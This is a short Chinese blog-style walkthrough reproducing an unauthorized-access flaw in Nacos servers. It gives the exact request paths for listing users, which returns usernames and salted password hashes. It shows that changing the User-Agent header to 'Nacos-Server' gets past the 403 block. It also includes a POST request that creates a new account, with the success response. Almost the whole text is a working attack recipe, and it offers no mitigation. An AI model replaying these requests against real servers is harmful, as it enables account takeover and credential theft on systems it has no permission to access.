Nacos未授权复现
Nacos入口
ip:端口/nacos
www.test.com:8848/nacos
未授权查看用户列表
http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=1
直接get方式访问该路径会403,
将user-agent头修改为Nacos-Server即可绕过403。
有些可以直接访问,有些需要改UA头
此时看到响应包中包含了系统存在的用户名nacos,密码为加盐之后的值。
未授权创建用户
访问 http://ip:8848/nacos/v1/auth/users
POST传参: username=abcabc&password=abcabc
如果出现403,别忘了修改User-Agent头为Nacos-Server
发送POST请求
{“code”: 200,”message”: null,”data”: “create user ok!”}
返回响应200,创建用户成功
查看现在存在几个用户
访问http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
http://ip:8848:指明了要请求的目标IP地址和端口号;
/nacos/v1/auth/users:指明了要访问的Nacos API接口路径;
pageNo=1&pageSize=9:指定了分页查询条件。
pageNo:表示需要返回的页码,从 1 开始计数。例如,如果想要返回第 2 页的数据,则将 pageNo 设置为 2。
pageSize:表示每一页的数据条数。例如,如果想要每页返回 20 条数据,则将 pageSize 设置为 20。
OK,
刚刚创建的abcabc用户已经存在了。
更多方法
https://blog.csdn.net/m0_73353130/article/details/131786333
暂无评论内容